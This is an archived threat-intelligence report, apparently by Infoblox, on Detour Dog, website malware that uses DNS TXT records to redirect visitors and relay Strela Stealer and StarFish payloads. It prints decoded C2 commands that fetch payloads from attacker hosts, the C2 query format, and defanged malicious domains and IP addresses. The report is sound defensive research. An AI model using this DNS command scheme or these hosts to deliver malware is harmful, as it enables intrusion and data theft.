{
	"id": "5133a3a6-0647-458c-b2ea-40d410ccd64f",
	"created_at": "2026-04-06T00:14:39.940023Z",
	"updated_at": "2026-04-10T03:23:31.586553Z",
	"deleted_at": null,
	"sha1_hash": "61ee4d2259264c9936cf509052ff3b5a021fd33e",
	"title": "Detour Dog: DNS Malware Powers Strela Stealer Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 594562,
	"plain_text": "Detour Dog: DNS Malware Powers Strela Stealer Campaigns\r\nBy Infoblox Threat Intel\r\nPublished: 2025-09-30 · Archived: 2026-04-05 16:26:48 UTC\r\nTens of thousands of websites worldwide are infected with malware that utilizes the Domain Name System (DNS)\r\nto conditionally redirect visitors to malicious content. These DNS requests are made server-side, meaning from the\r\nwebsite itself, and are not visible to the visitor. We have tracked the threat actor that operates this malware since\r\nAugust 2023. The malicious name server conditionally instructs the website to redirect the visitor based on their\r\nlocation and device type. While traditionally these redirects led to scams, the malware has evolved recently to\r\nexecute remote content through the DNS-based command-and-control (C2) system. We are tracking the threat\r\nactor who controls this malware as Detour Dog.\r\nDetour Dog played a major role in campaigns to spread Strela Stealer this summer. In June, we learnt from\r\nexternal researchers that Detour Dog-owned infrastructure was hosting a backdoor malware, StarFish, used to\r\ninstall the information stealer. The domains were seen in malicious email attachments that targeted Germany.\r\nDigging into our own spam collection, we discovered that websites compromised by Detour Dog also appeared to\r\nhost the first stage of the information stealer. Of the confirmed StarFish staging hosts, at least 69 percent were\r\nunder Detour Dog control; the true percentage is likely much higher.\r\nTo our surprise, another system we track via DNS, a MikroTik botnet advertised as REM Proxy, was part of the\r\nattack chain. Strela Stealer is operated by an actor known as Hive0145 and traditionally distributed through\r\nattachments in mass email. The spam seen in June and July was delivered by both REM Proxy and a different\r\nbotnet, Tofsee. Detour Dog hosted the first stage of the attack in campaigns from both sources.\r\nBut Detour Dog did more than host the backdoor malware: they helped distribute the stealer via DNS TXT\r\nrecords. The actor-controlled name servers were modified to interpret specially formatted DNS queries from the\r\ncompromised sites and to respond with remote code execution commands. Starting June 8, we saw responses from\r\nthe servers that directed the infected site to fetch the output of PHP scripts from verified Strela Stealer C2 servers,\r\nand from these covert communications we perceive the likelihood of a malware distribution system, where DNS\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 1 of 13\n\nacts as both a command channel and a delivery mechanism. A novel setup like this would allow an attacker to hide\r\ntheir identity behind compromised websites making their operations more resilient, meanwhile serving to mislead\r\nthreat hunters because the malware isn’t really where the analyzed attachments indicate the stage is hosted.\r\nThis marks the first time Detour Dog is known to deliver malware to home users.\r\nFor years, Detour Dog exclusively forwarded traffic to Los Pollos. In late-November 2024, that changed. The\r\nservers began redirecting visitors to Help TDS, which in turn routed traffic via Monetizer TDS. In those flows we\r\nobserved malicious campaigns operated by third-party affiliates. While the advertising network utilized by Detour\r\nDog changed, the outcome did not.\r\nThe website malware fundamentally advanced in spring 2025. The actor added a new capability to command\r\ninfected websites to execute code from remote servers. Responses to TXT record queries are Base64-encoded and\r\nexplicitly include the word “down” to trigger this new action. We believe this has created a novel networked\r\nmalware distribution model using DNS in which the different stages are fetched from different hosts under the\r\nthreat actor’s control and are relayed back when the user interacts with the campaign lure, for example, the email\r\nattachment.\r\nTo our knowledge, this technique, shown in Figure 1, has not been reported. Through this method, the actor\r\nmisdirects defenders and obfuscates the true location of the malware. With a large network of infected hosts, this\r\nmight be considered a three card monte version of malware distribution.\r\nFigure 1. Diagram of theorized attack chain utilizing DNS TXT records for C2\r\nMost of the time, when a user visits one of the sites, they see the original site. In some cases, they will be\r\nredirected to a scam via Help TDS. But in rare cases, the site will receive a remote file execution command. The\r\nfact that most of the time there is no apparent compromise of the site, and that it is difficult to reproduce malicious\r\nredirections, allows Detour Dog to persist. We have seen sites infected for over a year. When combined with the\r\nnew remote execution feature, the ways in which the threat actor can deliver malicious content are complex. The\r\nattack chains currently known to utilize Detour Dog-controlled assets are shown in Figure 2.\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 2 of 13\n\nFigure 2. Multiple attack vectors utilize Detour Dog-controlled assets\r\nDetour Dog operations appear to extend beyond the DNS C2 website malware. We unwound the history of Detour\r\nDog back to February 2020, well before the website malware was discovered. Detour Dog handcrafts tracking\r\nidentifiers that are carried across multiple traffic distribution systems (TDSs), which allowed us to connect\r\nseemingly independent activity over long periods of time.\r\nWe have attempted to disrupt Detour Dog through abuse reporting. In August 2025, after the registrar WebNIC\r\nrefused to suspend the active DNS C2 server, webdmonitor[.]io, the Shadowserver Foundation sinkholed the\r\ndomain. This gave us a fresh look at the infected websites, as well as the actor’s ability to respond to the\r\ndisruption. It took Detour Dog only a few hours to establish a new C2 and regain control of the infected sites.\r\nA week later, Shadowserver sinkholed the second domain and provided us with over 39 million DNS TXT queries\r\nto analyze. Approximately 30,000 infected hosts, within 584 top-level domains (TLDs), were seen in a 48-hour\r\nwindow. The queries show a significant amount of bot traffic; at its peak, the sinkhole received 2 million TXT\r\nrequests in an hour and included encoded IP addresses that didn’t correspond to natural human traffic. While bot\r\ntraffic is a known plague in affiliate advertising, the sheer volume was astonishing. We will dig into the details\r\nlater in the section entitled Sinkholing the C2 Domain.\r\nDNS queries hint that Detour Dog is still maturing remote file execution capabilities. Currently, evidence suggests\r\nthat Detour Dog and Hive0145 are distinct actors. It’s possible, based on history from the last four years, that\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 3 of 13\n\nDetour Dog is providing a service to others, in which case Hive0145 may just be the first partner to receive\r\nmalware distribution support via the network of infected hosts.\r\nDNS TXT C2\r\nDetour Dog-infected websites make queries to the DNS C2 using a subdomain that includes user information. The\r\nquery format has changed slightly over the last few years but retains the same general structure:\r\n\u003cinfected-host\u003e.\u003cvisitor-ip\u003e.\u003crand-num\u003e.\u003ctype\u003e.c2_domain\r\nwhere the “type” is not always present. Initially, these queries were client-side, but changed to server-side in\r\nApril 2024. With this change, the actor began encoding information about the client device type, for example, “ni”\r\nfor iPhone. We have seen several values in the “type” field over the last few years.\r\nMost of the time, Detour Dog instructs the infected site to display its original content, that is, “do nothing.” We\r\nanalyzed over 4 million TXT records from the C2 server, which is the authoritative server for the C2 domain,\r\nrecorded between August 6 and August 8. The responses were distributed as shown in Figure 3. Queries to the\r\nserver include a very high volume of bot traffic; however, we haven’t observed a consistent pattern for which the\r\nserver responds with a redirect. We suspect they limit redirections in part to avoid detection.\r\nFigure 3. Detour Dog responses August 6-8 to queries from infected hosts\r\nThe TXT responses are Base64 encoded and currently have the form\r\nhttps://\u003credirector_domain\u003e/?\u003calphanumeric_string\u003e\r\nwhere the alphanumeric string changes in each response. This redirector has no filtering logic and has exclusively\r\nredirected to Help TDS URLs since November 20, 2024. Table 1 shows the redirector domains observed in 2025.\r\nThese domains were traditionally hosted with Cloudflare, allowing them to hide their true IP address. However,\r\nafter multiple disruptions, the actor began to openly run their servers, most recently in IP space belonging to\r\nKazakhstan (93[.]152[.]230[.]52).\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 4 of 13\n\nRedirector Domain First Seen Last Seen\r\ninfosystemsllc[.]com August 1, 2024 April 1, 2025\r\necomicrolab[.]com December 8, 2024 June 10, 2025\r\nflow-distributor[.]com June 15, 2025 July 15, 2025\r\nadvertipros[.]com June 10, 2025 Now\r\nTable 1. Domains contained in TXT record responses since January 2025\r\nOn April 1, 2025, a new type of TXT record response was identified, with the answer of\r\n“ZG93bmh0dHBzOi8vdGhpbmtwYWR3b3JrLmNvbS9kb3du”, which decodes to\r\n“downhttps://thinkpadwork.com/down”, and the server continued to occasionally respond like this to requests\r\nuntil June 26, 2025. Unfortunately, we were unable to determine what this URL hosted. The domain\r\nthinkpadwork[.]com was registered January 23, 2025, and uses Cloudflare nameservers.\r\nThe “down” command instructs the infected site to request the specified URL with curl and pass the output of the\r\nrequest into the body of the response to the victim. In the case of a PHP endpoint, the PHP script is executed on\r\nthe C2 server and the output is received by the compromised server and passed back to the victim.\r\nEnter StarFish Backdoor and Strela Stealer\r\nStrela Stealer is an information stealer first observed in late 2022. The operators, known as Hive0145, target\r\nEuropean countries, primarily Germany, using broadly distributed email that includes a malicious file. This\r\nsummer, malicious SVG attachments were used to download a reverse shell backdoor malware called StarFish.\r\nIBM X-Force and other researchers witnessed cases where StarFish then downloaded Strela Stealer.\r\nTo our surprise (and delight?), the latest reporting from IBM included a Detour Dog redirector domain,\r\nadvertipros[.]com. This sample, submitted to VirusTotal of an SVG file found in spam using German language\r\nlures about outstanding invoices, makes the following call to download the stealer malware:\r\nhxxps://advertipros[.]com//?u=script\r\nThis meant that Detour Dog domains were used to host malware, in addition to redirecting website visitors to\r\nscams. We set out to see if we could verify this with our own data. For months, we have tracked a spam botnet of\r\ncompromised MikroTik routers via DNS, which we now know, based on Black Lotus research, to be REM\r\nProxy. Using our own spam collection, we located multiple samples of Strela Stealer SVG distribution and\r\ndiscovered that they were all distributed by REM Proxy, confirming that Hive0145 is a customer of REM Proxy.\r\nOther external researchers reported spam delivered through the botnet, Tofsee.\r\nSamples in our spam collection led victims to download malware from domains compromised by Detour Dog. As\r\nan example, this SVG attachment downloaded StarFish from ywcanevada[.]org. But, a scan of the domain in\r\nurlscan has the telltale signs of a Detour Dog infection: visiting the domain led to a redirection through flow-distributor[.]com and on to Help TDS.\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 5 of 13\n\nAt this point in our investigation, we knew that the threat actor was hosting malware connected to Strela Stealer\r\nfrom their own infrastructure and that the same files were hosted on infrastructure they had compromised. Then\r\nwe discovered more connections between Detour Dog and Strela Stealer.\r\nTXT Record Connections\r\nWhen StarFish executes, it starts regular communication with the malware C2 server, exfiltrating data from the\r\nhost until it is told to stop. According to IBM, it does this by connecting to a hardcoded C2 server with the\r\n“server.php” endpoint and passing a unique identifier for the compromised machine. The server responds with\r\n“OK” and an optional command. If the string “%SCRIPT%” is included in the response, it gets converted to the\r\nlocal path of the reverse shell. The infected device responds via POST commands to the server.\r\nDetour Dog also included the StarFish C2 in TXT responses. On June 8, we saw the following response in\r\ndecoded records:\r\ndownhttp://176[.]65[.]138[.]152/script.php?u=j6cwaj0h67\r\nThis IP address was found in a public submission to ANY.RUN on June 10, 2025, that included an obfuscated\r\nJavaScript file. The script attempted to call out to an https[:]//176[.]65[.]138[.]152/server.php endpoint. The IP\r\naddress is also seen in a number of JavaScript files submitted to VirusTotal, which are categorized as remote\r\naccess trojans.\r\nThe URLs contained within TXT responses are slightly different from those reported for the stealer; they contain a\r\nscript.php endpoint and a “u” parameter. The DNS query that triggered this response incorporates new values for\r\nthe “type,” for example:\r\n\u003cinfected-host\u003e.\u003cip-address\u003e.\u003crand\u003e.nwuuj6cwaj0h67.webmonitor[.]io\r\nThe traditional two-letter values for the device type were replaced with a string that must be parsed by the name\r\nserver to respond correctly. If the query includes a type value of the format \u003cna|nw|nd\u003e.uu.\u003cvalue\u003e, the server will\r\ninterpret this and return an endpoint on the malware C2 server. If the query contains “nwuuscript”, the response\r\nhas no additional parameter:\r\ndownhttp:updatemsdnserver[.]com/script.php.\r\nIn addition to script.php, we have seen file.php returned in TXT records from June 11 to July 25, 2025 when the\r\nquery includes “nauufile”.\r\nIn the Strela Stealer attack chains we analyzed, “script” and “file” are parameters seen in requests sent to\r\ncompromised sites, originally initiated by the StarFish downloader, in the first and second stages respectively. For\r\nexample, in the REM Proxy emails within our spam collection this was the case. We consulted Golo Mühr, a\r\nresearcher at IBM X-Force who tracks Hive0145 and Strela Stealer. Golo speculated that the files could\r\npotentially include the decoy and the Strela payload. He clarified that the C2 server is used for all other parts of\r\nthe operation except staging StarFish.\r\nThese returns were a bit of a mystery, as we were unable to fetch the scripts ourselves, however IBM X-Force\r\nalerted us to a campaign they observed in July 2025, targeting Ukrainian government domains (gov[.]ua) that used\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 6 of 13\n\nscript.php and file.php endpoints. Unlike the operation by Hive0145 that leveraged Detour Dog infrastructure to\r\nobscure C2 locations, this campaign sent victim traffic directly to updatemssoft[.]com, which was hosted at the\r\nsame IP address as updatemsdnserver[.]com. Although the updatemssoft[.]com domain was not seen in Detour\r\nDog TXT responses, use of the file.php and script.php endpoints here were linked to StarFish/Strela staging.\r\nExamples of the malware samples used in this campaign can be seen here:\r\nhttps://www.virustotal.com/gui/domain/updatemssoft.com/relations.\r\nWe do have a theory based on his input. The sequence of events as shown in Figure 1 could explain the behavior:\r\n1. Initial Trigger\r\nThe victim opens a malicious document (e.g., a fake invoice), which launches an SVG file that calls out to\r\nan infected domain using the u=script parameter.\r\n2. DNS TXT Query\r\nThe infected site sends a TXT record request to the Detour Dog C2 server via DNS. The query includes a\r\ntype identifier like nwuuscript+{random string}, where the random string likely serves as a unique\r\nidentifier.\r\n3. C2 URL Response\r\nThe name server responds with a TXT record containing a Strela C2 URL, prefixed with down.\r\nExample: downhttp://updatemsdnserver.com/script.php?u={random string}\r\n4. Payload Retrieval\r\nThe infected site strips the down prefix and uses curl to fetch the next-stage payload from the Strela C2\r\nserver. We suspect the output of this request to script.php is the StarFish downloader. Because the curl\r\nrequest occurs server-side, it is not visible to the visitor.\r\n5. Payload Delivery\r\nThe compromised site acts as a relay for the C2, passing the output from the C2 server to the client. One\r\nhint that server-side commands are occurring is shown in this example, where the URL redirects to itself\r\nrepeatedly before displaying the StarFish downloader script.\r\nExample at: https://urlscan.io/result/019782b4-1f1f-7718-a9a4-246596e0ecb1\r\n6. Second Stage Callout\r\nThe downloader script initiates another callout to a different compromised domain, this time using the\r\nu=file parameter.\r\n7. Second DNS TXT Query\r\nThe second compromised site sends a similar DNS TXT query to the Detour Dog C2 server, now using\r\nnwuufile+{random string}.\r\n8. Second C2 URL Response\r\nThe Detour Dog name server responds with a new Strela C2 URL pointing to file.php, again prefixed with\r\ndown.\r\n9. Second Payload Retrieval\r\nThe compromised site strips the prefix and initiates another curl request to the Strela C2 server, this time\r\nreceiving a file in the response.\r\n10. Second Payload Delivery\r\nThe second compromised site relays the file to the client. The payload is a .zip archive containing a\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 7 of 13\n\nwscript trojan, believed to be StarFish; see the VirusTotal report here.\r\nExample at: https://urlscan.io/result/0197f99f-45fd-75f4-be91-a5529e8c6168\r\nThis theory would indicate that the attack cleverly leverages DNS as a covert channel to orchestrate a multi-step\r\ndelivery process. URLs embedded in DNS TXT records are used to fetch staged payloads—first a downloader\r\nscript, then a ZIP file—all relayed back to the victim via compromised infrastructure. Passive DNS logs include\r\nmany TXT queries with the phrase “test” embedded into the type string, indicating that the threat actor is\r\ncontinuing to evolve and perfect the system.\r\nWe also saw these domains in similar TXT record responses:\r\nnupdate0625[.]com\r\nmsdnupdate[.]com\r\nThe IP address used by updatemsdnserver[.]com, 95[.]164[.]123[.]57, also hosted:\r\nmssoftupdateserver[.]com\r\ndomainzone123[.]com\r\nupdatemssoft[.]com\r\nFigure 4 shows the overlap between Detour Dog TXT responses and known Hive0145 infrastructure, with specific\r\nexamples of known domains.\r\nFigure 4. Diagram of overlap in Detour Dog and some Hive0145 (StarFish/Strela Stealer) C2 infrastructure\r\nWhat’s Detour Dog All About?\r\nWe’ve been hunting this website malware using DNS for over two years. Bulletproof hosting and registrars, in\r\ncombination with the cloaked nature of Detour Dog’s activity, has allowed infections to persist on sites for very\r\nlong periods of time. When they moved from the scam delivery business to the information stealer business, we\r\ndoubled our efforts to trace the threat actor’s history.\r\nEarlier this year, we demonstrated that the DNS TXT C2 domains broke into two distinct sets. Each of these sets\r\nhave distinct hosting and redirection patterns. Detour Dog refers to the actor who controls the larger set of\r\ndomains, including those shown in Table 2 as well as those we have previously reported. We have not seen the\r\nsmaller set since December 2024, and we are unable to definitively tie them to Detour Dog although they\r\noutwardly appear the same.\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 8 of 13\n\nC2 Domain First Seen Last Seen\r\naeroarrows[.]io August 1, 2025 August 6, 2025\r\nairlogs[.]net April 23, 2024 Current\r\ncdn-routing[.]com July 8, 2024 Current\r\nwebdmonitor[.]io October 7, 2024 July 28, 2025\r\nTable 2. C2 domains observed with remote file URLs in TXT records\r\nWe originally attributed Detour Dog to the Los Pollos affiliate identified in push monetization links by\r\n“CHiI7Gh3GUyTa8XGgNqDyQ”. Specifically, this value was seen in URLs returned by Detour Dog for the “pl”\r\nparameter; we believe these are Taco Loco links. This affiliate id was first seen in public sources on August 20,\r\n2023, consistent with initial reporting of the use of TXT records. The second, possibly unrelated, DNS C2 set\r\ncontains a Los Pollos affiliate id, pe7k605, that dates to December 2019.\r\nMore recently, we extended our understanding of Detour Dog by locating attack chains that included both the\r\nknown Detour Dog redirector domains and a Los Pollos affiliate id, bt1k60t. This affiliate id predates the use of\r\nDNS TXT records as a control mechanism and was only exposed for a few days while Detour Dog migrated from\r\none TDS to another, but these few days allowed us to unwind several years of the threat actor’s operations.\r\nTo explain how we unraveled the Detour Dog campaigns, we need to provide a little history of the change. On\r\nNovember 13, 2024, Qurium disclosed that Russian Dopplegänger disinformation campaigns leveraged Los\r\nPollos to disguise their operations. Shortly after, Los Pollos announced to their affiliates that they were suspending\r\ntheir “push monetization” vertical. This vertical served fake CAPTCHAs that duped users into accepting browser\r\nnotifications, creating a persistent mechanism to deliver scams to a device.\r\nOn November 17, Detour Dog routed site visitors to Help TDS, which then forwarded them to Los Pollos, where\r\nthey received the fake CAPTCHA per usual. This change, visible in a public scan, provided critical clues to\r\nunderstanding the actor. In affiliate advertising platforms, there are unique identifiers for publishing affiliates (i.e.,\r\nthose who source traffic for the platform). Additionally, there are often parameters that can be set by the affiliate to\r\ntrack their own campaigns. Figure 5 shows the redirection chain from Detour Dog on that date. This series of\r\nredirects shows that following a visit to the infected site:\r\nThe Detour Dog C2 redirected the user to infosystemsllc[.]com, which in turn redirected them to the Help\r\nTDS, as identified by the “help” path.\r\nThe user entered the Help TDS with the affiliate id 32161731835980 and was redirected to a Los Pollos\r\ndomain incomehub-your[.]on.\r\nDetour Dog configured the t (tracker) and cid (click id) parameters of their Los Pollos link to include\r\ncid:11005.\r\nThe Los Pollos link also includes the affiliate id bt1k60t and the site is redirected to another domain,\r\nbraraildye[.]live, hosted in Hetzner, which we believe is part of Taco Loco.\r\nThe chain redirects through AS6898/AS5398, then through Amazon, before finally leading to a decoy page\r\nat Google.\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 9 of 13\n\nFigure 5. A Detour Dog redirect chain through Help TDS and Los Pollos, seen on November 17, 2024. This is the\r\nfirst time cid=11005 is observed in a Los Pollos smartlink. Credit urlscan[.]io.\r\nThe redirection chain in Figure 5 associates Detour Dog with the Help TDS affiliate id 32161731835980 and the\r\nLos Pollos affiliate id u=bt1k60t. This is also the first known time that the value “cid:11005” is used as a tracking\r\nparameter (t=) in a Los Pollos URL. Over the next few days, this behavior of redirecting through Help TDS to Los\r\nPollos via these same affiliate ids continues.\r\nOn November 20, Detour Dog attack chains shifted to what they are today. Figure 6 shows a redirection chain\r\nfrom that date:\r\nDetour Dog redirects the infected site visitor to infosystemsllc[.]com, which immediately redirects to Help\r\nTDS.\r\nThe Help TDS affiliate id is 32161731835980, and that causes a redirection to Monetizer TDS.\r\nThe Monetizer URL contains “utm_campaign=cid:11005”, the exact value previously used by Los Pollos\r\naffiliate u=bt1k60t.\r\nThe Monetizer URL contains a cid structured identically to that of the Los Pollos TDS.\r\nFigure 6. A Detour Dog redirect chain through Help TDS and Monetizer, seen on November 20, 2024. The\r\nMonetizer cid value is constructed identically to the Los Pollos value seen on November 17th. Credit urlscan[.]io\r\nThese scans imply that Detour Dog had the Los Pollos affiliate id bt1k60t. We discovered that Detour Dog\r\noperations began well before DNS TXT records were used for a C2. The earliest known activity occurred on\r\nFebruary 27, 2020, and the last time that affiliate id was observed was December 11, 2024. But using ids across\r\naffiliate programs and unusual tracker values, we uncovered more of the threat actor’s activity.\r\nDuring the entire time that Detour Dog was an affiliate of Los Pollos, they were also an affiliate of Help TDS.\r\nDetour Dog uses a unique cid value for each Help TDS affiliate id. For example, cid:10 was used exclusively with\r\nHelp TDS affiliate 51577283903. Combining the known Los Pollos and Taco Loco affiliate ids with the Help TDS\r\nvalues, we created a composite view of Detour Dog campaigns between February 2020 and September 18 of this\r\nyear, shown in Figure 7.\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 10 of 13\n\nFigure 7. Timeline of Detour Dog flows observed via Los Pollos, Help TDS, and Monetizer, as tracked through\r\naffiliate ids and custom cid values. Details as of September 18, 2025. The logos shown are logos of the affiliate\r\nnetworks used by the actor. This timeline is created through analysis of data from urlscan[.]io and Infoblox Threat\r\nIntel independent open-source research.\r\nAnalysis uncovered other affiliate ids associated with Detour Dog, but their patterns remained consistent over the\r\nlast five and a half years. It is unknown whether Detour Dog is a service provider or simultaneously operating\r\ncampaigns of their own. While there is a one-to-one match between their help TDS affiliate id and cid values, Los\r\nPollos and Taco Loco affiliate ids are used across multiple cid values.\r\nDetour Dog uses bulletproof providers, but we collaborated with the Shadowserver Foundation to disrupt their\r\nDNS C2 not just once, but twice in August 2025.\r\nSinkholing the C2 Domain\r\nWe reported the Detour Dog domain, webdmonitor[.]io, to the registrar, WebNIC, on June 24, 2025. In a series of\r\n16 email exchanges, we explained to the registrar how the website malware operated and the importance within\r\nthe threat landscape. After WebNIC responded “We have notified the respective parties to investigate and take the\r\nnecessary action” on June 26, we expected the domain to be suspended. It was not. We continued to pressure the\r\nregistrar to act. We also reached out to .io registry and did not receive a response. On July 22, despite our\r\ndemonstration of how to trigger a response from the malicious name server, WebNIC responded:\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 11 of 13\n\n“While we acknowledge that the registrar is not responsible for the content hosted on a third-party site, registrars\r\nare responsible for responding to well-documented complaints involving domain name abuse. In this context, we\r\nalso rely on respective parties and supporting evidence to investigate and take appropriate action. That said, based\r\non our current assessment, the domain in question has remained inactive and has not shown any recent hosting or\r\nweb activity for a considerable period.”\r\nDuring our four-week exchange, WebNIC acknowledged abuse but then accepted their customer’s word that no\r\nmalicious activity took place. They repeatedly responded with irrelevant answers, such as providing IPv4 (A)\r\nrecord responses instead of TXT responses. They did not place the domain on a client hold to suspend it at any\r\npoint. In our view, WebNIC’s responses were inadequate to address the reported abuse. ICANN independently\r\nsent WebNIC a notification on July 29, 2025, for breach of registrar accreditation agreement.\r\nOn July 30, Shadowserver Foundation sinkholed the domain. Within hours, Detour Dog had replaced the C2\r\ndomain with aeroarrows[.]io, again registered with WebNIC. On August 6, Shadowserver sinkholed the new C2\r\nand provided us with over 39 million queries received over approximately 48 hours to analyze.\r\nDespite the brief collection window, this dataset surfaced compelling insights into the campaign’s global footprint.\r\nWe observed approximately 30,000 unique domains spanning 584 distinct TLDs, all generating properly crafted\r\nDNS TXT queries to aeroarrows[.]io via web traffic originating worldwide. Within this set, just under 1% were\r\nqueries with the new longer “type” associated to download commands.\r\nWe reviewed both the IP address distribution of the encoded “visitor” and that of the infected sites. The sheer\r\nvolume of queries in such a short time indicated bot traffic. Within the IP addresses included in the queries, 89\r\ncountries were represented. The United States, Germany, and Taiwan stood out by unique IP volume, with the\r\nUnited States alone accounting for 37% of all the IP addresses identified visiting the compromised sites. But, the\r\ndata was heavily skewed as well: two IP addresses accounted for nearly 3 million queries alone. The reason for\r\nthis is a mystery.\r\nUsing the infected hostnames, we also looked at the hosting services and countries. Consider the infected site\r\nyy[.]ua, which we used as an example in Step 5 of our theorized attack chain earlier in this paper. There were\r\nnearly 2,500 queries for this domain in the collection. For several years, this site has shown content for a law\r\noffice in Moscow, but starting in June 2025, it was observed many times in urlscan submissions. In one case, it has\r\nthe telltale Detour Dog redirection signature, but in many others the submission URL contains u=script or u=file.\r\nSurprisingly, the percentage of download-style queries for yy[.]ua is much higher than average: a whopping 30%\r\nof the queries for the domain. Of these, the vast majority contained “nwuutest” and we are unsure what the “test”\r\nmay indicate. But over a hundred queries were for the script or file endpoints. Traditionally, the IP address\r\nencoded in the query was that of the website visitor, but the sinkhole data not only demonstrates large volumes of\r\nautomated traffic but presents a mystery in how the queries related to the new type are created. The encoded IPs\r\nincluded addresses that are unlikely to be connected to human users, such as ones belonging to the U.S.\r\nDepartment of Defense. For example, 29[.]87[.]121[.]154, 215[.]226[.]38[.]106, and 33[.]35[.]245[.]179 were all\r\nseen in queries; the likelihood of these being a source of human traffic is very low.\r\nHow was this enormous volume of queries generated? Why does it contain IP addresses that don’t relate to human\r\nusers? These are mysteries that might be resolved with direct access to the malware on the sites.\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 12 of 13\n\nFind our released threat indicators for Detour Dog, Stela Stealer, and other threats on our GitHub here.\r\nNote: Entities, brands, and intermediaries are mentioned in this report because telemetry or public records link\r\nthem to the observed redirection chains. Mention alone does not imply knowledge of or participation in unlawful\r\nactivity.\r\nSource: https://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nhttps://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/"
	],
	"report_names": [
		"detour-dog-dns-malware-powers-strela-stealer-campaigns"
	],
	"threat_actors": [
		{
			"id": "28349be5-ce76-4a45-9502-707953dd2f07",
			"created_at": "2025-05-29T02:00:03.210059Z",
			"updated_at": "2026-04-10T02:00:03.86427Z",
			"deleted_at": null,
			"main_name": "HIVE-0145",
			"aliases": [
				"Hive0145"
			],
			"source_name": "MISPGALAXY:HIVE-0145",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434479,
	"ts_updated_at": 1775791411,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/61ee4d2259264c9936cf509052ff3b5a021fd33e.pdf",
		"text": "https://archive.orkl.eu/61ee4d2259264c9936cf509052ff3b5a021fd33e.txt",
		"img": "https://archive.orkl.eu/61ee4d2259264c9936cf509052ff3b5a021fd33e.jpg"
	}
}